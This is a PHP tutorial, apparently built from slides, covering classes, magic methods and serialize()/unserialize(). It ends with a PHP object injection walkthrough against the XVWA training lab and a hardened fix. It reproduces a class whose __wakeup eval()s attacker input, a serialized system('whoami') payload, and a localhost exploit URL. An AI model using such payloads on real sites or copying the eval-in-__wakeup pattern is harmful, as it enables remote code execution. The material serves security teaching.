PHP Object Injection
Understanding PHP class & objects
Creating Class in php
class Car {
// The code
}
Adding Properties to class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
}
Creating an Object from a class
$bmw = new Car ();
Creating more objects from a class
$bmw = new Car ();
$mercedes = new Car ();
Getting Object's properties
echo $bmw -> color;
echo $mercedes -> color;
Setting Object's properties
$bmw -> color = 'blue';
Adding methods to a class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
Using methods from Objects
$bmw = new Car ();
$mercedes = new Car ();
echo $bmw -> hello();
echo $mercedes -> hello();
Test Case
<?php
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
$bmw=new Car();
echo $bmw -> color;
?>
Result for Test Case
beige
Understanding $this keyword
Class
class Car {
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
public function hello()
{
return "beep";
}
}
$this usage
$this -> propertyName;
$this -> methodName();
$this usage with class
class Car {
// The properties
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
// The method can now approach the class properties
// with the $this keyword
public function hello()
{
return "Beep I am a <i>" . $this -> comp . "</i>, and I am <i>" .
$this -> color;
}
}
Objects with class
$bmw = new Car();
$mercedes = new Car();
Call Method with objects
echo $bmw -> hello();
Test Case for $this
<?php
class Car {
// The properties
public $comp;
public $color = 'beige';
public $hasSunRoof = true;
// The method can now approach the class properties
// with the $this keyword
public function hello()
{
return "Beep I am a <i>" . $this -> comp . "</i>, and I am <i>" .
$this -> color;
}
}
$bmw = new Car();
echo $bmw -> hello();
?>
Result for Test Case $this
Beep I am a <i></i>, and I am <i>beige
($comp was never set, so it is null and prints as an empty string.)
Understanding Magic Methods & Constants
__construct()
class Car{
private $model;
// A constructor method.
public function __construct($model)
{
$this -> model = $model;
}
}
Objects from a class
$car1 = new Car();
Result
Warning: Missing argument 1 for Car::__construct()
(This warning is PHP 5 / 7.0 behaviour; from PHP 7.1 onward the call fails with a fatal ArgumentCountError instead.)
Adding Argument
$car1 = new Car("Mercedes");
Adding output method for echo
class Car {
private $model;
//__construct
public function __construct ($model)
{
$this -> model = $model;
}
public function getCarModel()
{
return ' The car model is: ' . $this -> model;
}
}
Object with arguments for __construct() & echo via getCarModel()
$car1 = new Car("Mercedes");
echo $car1 -> getCarModel();
Test Case for Magic Methods
<?php
class Car {
private $model;
//__construct
public function __construct ($model)
{
$this -> model = $model;
}
public function getCarModel()
{
return ' The car model is: ' . $this -> model;
}
}
//We pass the value of the variable once we create the object
$car1 = new Car("Mercedes");
echo $car1 -> getCarModel();
?>
Result for Test Case magic methods
The car model is: Mercedes
Understanding serialize() & unserialize()
serialize usage
$serialized = serialize($obj);
unserialize usage
$obj2 = unserialize($serialized);
A class to test serialize & unserialize
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function hello()
{
return $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
Echo test
$obj = new Test();
$serialized = serialize($obj);
echo "Serialized : ".$serialized;
$obj2 = unserialize($serialized);
echo "Unserialized from $serialized : ".$obj2->hello();
Test Case for serialize & unserialize
<?php
class Test
{
public $variable = 'BUZZ';
public $variable2 = 'OTHER';
public function hello()
{
return $this->variable . '<br />';
}
public function __construct()
{
echo '__construct<br />';
}
public function __destruct()
{
echo '__destruct<br />';
}
public function __wakeup()
{
echo '__wakeup<br />';
}
public function __sleep()
{
echo '__sleep<br />';
return array('variable', 'variable2');
}
}
$obj = new Test();
$serialized = serialize($obj);
echo "Serialized : ".$serialized;
$obj2 = unserialize($serialized);
echo "Unserialized from $serialized : ".$obj2->hello();
?>
Result for Test Case
The output shows the order in which the magic methods fire: __construct when the object is created, __sleep inside serialize(), then the serialized string O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";}, then __wakeup inside unserialize(), then BUZZ from hello(), and finally __destruct twice at the end of the script (once for $obj and once for $obj2).
Understanding PHP Object Injection
Class from XVWA
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
Serialized from XVWA
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
User input for Object
$var1=unserialize($_REQUEST['r']);
This means the call is effectively
$var1=unserialize('a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}');
Output from XVWA
echo "<br/>".$var1[0]." - ".$var1[1];
Generating the serialized form of $inject with class PHPObjectInjection
<?php
class PHPObjectInjection
{
public $inject="system('whoami');";
}
$obj=new PHPObjectInjection();
var_dump(serialize($obj));
?>
Result
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
PHP Object Injection for XVWA
http://localhost:8012/xvwa/vulnerabilities/php_object_injection/?r=O:18:%22PHPObjectInjection%22:1:{s:6:%22inject%22;s:17:%22system(%27whoami%27);%22;}
Result
Why does system('whoami') work?
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
eval() executes a string as PHP code. unserialize() builds a PHPObjectInjection object from the attacker-controlled input and calls its __wakeup(), which passes the attacker-controlled $inject property to eval(), so the command runs with the privileges of the web server process.
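The fix is to never let untrusted input instantiate objects. The following is an added example (not XVWA code, PHP 7.1+): the same r= parameter is parsed with unserialize()'s allowed_classes option set to false and then checked against the only shape the page expects, a list of strings. The function and variable names are hypothetical; the two payloads are the legitimate XVWA array and the injected object from the slides.

```php
<?php
// Added example, not XVWA code: handle the r= parameter so that an
// attacker-supplied serialized object can never reach __wakeup() or __destruct().
declare(strict_types=1);

class PHPObjectInjection
{
    public $inject;

    public function __wakeup()
    {
        // XVWA runs eval($this->inject) here; this copy only reports the call so
        // the example can show that the hardened path never triggers it.
        echo "__wakeup() reached with inject=" . var_export($this->inject, true) . "\n";
    }
}

// The page only ever expects a list of strings, so that is all we accept.
// allowed_classes => false (PHP >= 7.0) makes unserialize() turn every object
// in the payload into __PHP_Incomplete_Class instead of instantiating it, so no
// class's magic methods can run, whatever class name the payload carries.
function safeUnserializeStringList(string $input): ?array
{
    $data = @unserialize($input, ['allowed_classes' => false]);
    if (!is_array($data)) {
        return null; // false (malformed), a scalar, or an (incomplete) object
    }
    foreach ($data as $item) {
        if (!is_string($item)) {
            return null; // nested arrays/objects are not part of the expected shape
        }
    }
    return $data;
}

// Constructed inputs: the legitimate XVWA array and the injected object from the slides.
$payloads = [
    'legit'    => 'a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}',
    'injected' => 'O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system(\'whoami\');";}',
];

foreach ($payloads as $label => $payload) {
    $result = safeUnserializeStringList($payload);
    if ($result === null) {
        echo "$label: rejected, nothing was instantiated or executed\n";
    } else {
        echo "$label: " . implode(' - ', $result) . "\n";
    }
}
```

Where the application controls both ends, the stronger option is to stop using serialize() for user-facing data altogether and exchange json_encode()/json_decode() output, which cannot describe PHP objects at all.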